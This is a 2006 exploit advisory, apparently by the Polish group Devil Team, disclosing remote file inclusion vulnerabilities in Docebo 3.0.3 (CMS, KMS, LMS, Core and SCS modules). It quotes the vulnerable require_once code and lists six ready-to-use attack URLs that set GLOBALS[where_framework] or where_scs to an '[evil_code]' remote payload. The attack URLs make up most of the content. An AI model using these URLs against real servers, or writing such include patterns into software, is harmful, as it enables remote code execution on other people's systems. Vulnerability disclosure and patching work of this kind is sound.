Rated as : High Risk
################ DEVIL TEAM THE BEST POLISH TEAM #################
#Docebo 3.0.3/DoceboCMS,DoceboKms,DoceboLms,DoceboCore,DoceboScs - Remote
File Include Vulnerabilities
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
####################################################################
#Docebo Site: http://www.docebocms.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In All scripts:
[code]
require_once($GLOBALS['where_framework'].'/lib/lib.permission.php');
require_once($GLOBALS['where_framework'].'/lib/lib.pagewriter.php');
require_once($GLOBALS['where_framework'].'/lib/lib.lang.php');
require_once($GLOBALS['where_framework'].'/lib/lib.template.php');
require_once($GLOBALS['where_framework'].'/lib/lib.mimetype.php');
[/code]
#DoceboCMS:
http://www.site.com/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=[evil_code]
#DoceboKms:
http://www.site.com/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=[evil_code]
http://www.site.com/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=[evil_code]
#DoceboLms:
http://www.site.com/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=[evil_code]
#DoceboCore:
http://www.site.com/doceboCore/lib/lib.php?GLOBALS[where_framework]=[evil_code]
#DoceboScs:
http://www.site.com/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=[evil_code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#The End ;-)
#Pozdro Dla wszystkich o których zapomnia.em ;-)
securitydot.net - 2006-05-23
|
